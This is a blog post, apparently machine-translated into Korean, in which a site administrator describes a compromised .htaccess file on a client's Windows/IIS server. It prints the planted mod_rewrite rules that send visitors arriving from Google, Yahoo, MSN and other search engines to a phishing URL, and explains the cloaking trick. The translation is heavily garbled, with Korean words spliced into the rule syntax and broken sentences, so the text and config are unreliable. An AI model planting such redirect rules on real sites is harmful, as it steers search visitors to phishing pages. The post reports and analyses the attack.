목요일, 월 22 일, 2009 | 저자:

I는 아주 최근에 의한 클라이언트의 웹 사이트에 문제 발견 .htaccess로 파일. 이 사이트는 호​​스팅되었습니다 윈도우 서버가 실행 IIS 사용 IISPassword, 이는 사용하게 .htaccess로 해당 설정에 대한 파일.

IISPassword이와 같이 동일한 규칙을 따르지 않는 아파치 그러나. htaccess로 파일이 다음을 존재하는 경우 해야 IISPassword에 적합한 규칙을 포함, 그렇지 않으면 서버는 다음과 같은 오류를 반환:

Error 500 given by IIS Password
여기 htaccess로 파일의 컨텐츠이다. 난 단지 적절하게 example.com 가리 키도록 최종 리디렉션 URL을 수정 한:

한다 RewriteEngine 
한다 RewriteCond %{HTTP_REFERER} .*구글. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*AOL은. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*MSN. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*야후. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*Yandex 주차. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*어슬렁. * $ [NC,OR]
한다 RewriteCond %{HTTP_REFERER} .*. * $ [NC]
RewriteRule의 .* HTTP://siffy 피싱 - url.example.com [R,L]

이 경우 했다 아파치를 실행하는 서버에 mod_rewrite를, 대부분의 웹 사용자는 올바른 사이트 콘텐츠에 직접 갈 것입니다. 그들은 htaccess로에 나와있는 검색 엔진과 인덱스를 통해 사이트에 도달하는 경우에만, 그들은 크래커 피해자가 도달하고자하는 siffy 피싱 URL로 리디렉션 될 것이다.

물론, 크래커 (또는 심지어 자동화 된 웜) 문제의 서버도이 mod_rewrite는 규칙을 지원하지 몰랐어요. 그러나 어느 쪽이든, I 사이트가 있는지 여부에 대해 많은 인자를 예견 할 수 이것은 매우 걱정이다 작업

몫
범주: 호스팅, 임의
당신은을 통해이 입장에 어떤 응답을 따를 수 있습니다 RSS 2.0 먹이. 당신은 할 수 있습니다 응답을 떠나, 또는 트랙백 자신의 사이트에서.
회신을 남겨주세요 » 로그인